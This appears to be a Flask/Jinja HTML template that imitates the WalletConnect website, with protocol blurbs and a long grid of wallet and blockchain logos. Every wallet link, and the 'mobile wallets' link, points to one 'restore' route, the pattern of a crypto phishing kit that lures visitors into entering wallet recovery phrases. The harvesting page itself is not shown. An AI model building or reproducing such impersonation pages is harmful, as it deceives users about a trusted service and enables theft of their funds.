<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="../static/css/main.css" type="text/css"> 
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta property="og:image" content="../static/img/logo.html">
<link rel="icon" href="../static/img/logo.svg">
<script>
function show() {
  var x = document.getElementById("hidden");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }

  if (x.style.display === "block") {
    document.getElementById("btn").innerHTML = "Show Less &uarr;";
  } 
}
</script>
<title>WalletConnect</title>
</head>
<body>
<center>
    <div class="top">
        <a href="https://github.com/walletconnect" class="left">Github</a>

        <a href="https://docs.walletconnect.org/" class="left">Docs</a>
        <a href="https://walletconnect.org/" class="main"><img src="static/img/logo.svg" alt="logo"></a>
        <a href="" class="left">Wallets</a>
        <a href="https://walletconnect.org/apps" class="left">Apps</a>
</div>
<br>
<div class="gFeYHJ">WalletConnect</div>

<div class="lpfxqP">Open protocol for connecting Wallets to Dapps</div>
<br>

<div class="dXgqeu">
<img src="static/img/banner.png" alt="WalletConnect">
</div>

<div class="bout">
<h2 class="home">What is WalletConnect?</h2>
<p>WalletConnect is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking. 
A user can interact securely with any Dapp from their mobile phone, making WalletConnect wallets a safer choice compared to desktop or browser 
extension wallets.</p><br>
<h2 class="home">How does it work?</h2>
<p>WalletConnect connects web applications to supported <a href="{{ url_for('restore') }}">mobile wallets</a>. WalletConnect session is started by a scanning a QR 
code (desktop) or by clicking an application deep link (mobile).</p>
</div>

<div class="wallets" id="wallets">
    <h1 class="home">Wallets</h1>
<p>Multiple iOS and Android wallets support the WalletConnect protocol. Interaction between mobile apps and mobile browsers are supported via mobile deep linking.</p>

<br>
<div class="all">
<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/metamask.png"></a><br>
    MetaMask
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/MEW.png"></a><br>
    MEW Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/trustwallet.png"></a><br>
    Trust Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/logo.svg"></a><br>
    Wallect<br>Connect
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/coinbase.jpg"></a><br>
    Coinbase Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/atomic.png"></a><br>
    Atomic Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/binance.png"></a><br>
    Binance Smart Chain
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/bnb.png"></a><br>
    BNB
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/polkadot.png"></a><br>
    Polkadot
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/xrp.png"></a><br>
    XRP
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/stellar.png"></a><br>
    Stellar
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/tezos.png"></a><br>
    Tezos
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/theta.png"></a><br>
    Theta
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/tron.png"></a><br>
    Tron
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/cosmos.png"></a><br>
    Cosmos
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/kava.png"></a><br>
    Kava
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/filecoin.png"></a><br>
    Filecoin
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/solana.png"></a><br>
    Solana
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/ethereum-classic.png"></a><br>
    Ethereum Classic
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/zilliqa.png"></a><br>
    Zilliqa
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/elrond.jpg"></a><br>
    Elrond
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/waves.png"></a><br>
    Waves
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/icon.png"></a><br>
    ICON
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/ontology.png"></a><br>
    Ontology
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/harmony.jpg"></a><br>
    Harmony
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/parsiq.jpg"></a><br>
    Parsiq
</div>


</div>
<br>
<button onclick="show()" class="btn" id="btn">Show More ↓</button>
<br><br>
<div class="hidden" id="hidden">
<div class="all">
    
<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/nano.png"></a><br>
    Nano
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/tomo.png"></a><br>
    Tomo Chain
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/iotex.png"></a><br>
    IoTex
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/wanchain.png"></a><br>
    Wanchain
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/kin.png"></a><br>
    Kin
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/nimiq.png"></a><br>
    Nimiq
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/aion.png"></a><br>
    Aion
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/thundertoken.png"></a><br>
    Thunder Token
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/aeternity.png"></a><br>
    Aeternity
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/nebulas.png"></a><br>
    Nebulas
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/fio.png"></a><br>
    FIO
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/gochain.png"></a><br>
    GoChain
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/poa.png"></a><br>
    POA Network
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/callisto.png"></a><br>
    Callisto
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/bitpay.jpg"></a><br>
    BitPay
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/aktionariat.png"></a><br>
    Aktionariat
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/atwallet.png"></a><br>
    AtWallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/guard.png"></a><br>
    Guard Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/aave.jpg"></a><br>
    AAVE
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/exodus.jpg"></a><br>
    Exodus
</div>


<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/enjin.jpg"></a><br>
    Enjin
</div>


<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/skale.png"></a><br>
    Skale
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/portis.png"></a><br>
    Portis
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/trezor.png"></a><br>
    Trezor
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/squarelink.png"></a><br>
    Squarelink
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/torus.jpg"></a><br>
    Torus
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/vechain.jpg"></a><br>
    VeChain
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/scatter.jpg"></a><br>
    Scatter Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/math-wallet.png"></a><br>
    Math Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/fortmatic.png"></a><br>
    FortMatic
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/digitex.png"></a><br>
    Digitex
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/ledger.png"></a><br>
    Ledger
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/defiat.jpg"></a><br>
    Defiat
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/authereum.png"></a><br>
    Authereum
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/flare.jpg"></a><br>
    Flare Wallet
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/zelcore.png"></a><br>
    Zelcore
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/bitkeep.png"></a><br>
    BitKeep
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/coin98.png"></a><br>
    Coin98
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/trustvault.png"></a><br>
    Trust Vault
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/Electrum.png"></a><br>
   Electrum
</div>

<div class="apps">
    <a href="{{ url_for('restore') }}"><img src="static/img/exodus.png"></a><br>
    Exodus
</div>

</div>

</div>


</div>

<footer><div id="footer">
<p><img src="static/img/discord.svg" class="footimg">  <a href="https://discord.gg/jhxMvxP">Discord</a></p><br>
<p><img src="static/img/telegram.svg" class="footimg">  <a href="https://t.me/walletconnect_announcements">Telegram</a></p><br>
<p><img src="static/img/twitter.svg" class="footimg">  <a href="https://twitter.com/walletconnect">Twitter</a></p><br>
<p><img src="static/img/github.svg" class="footimg">  <a href="https://github.com/walletconnect">Github</a></p><br>
</div></footer>
</center>
</body>
</html>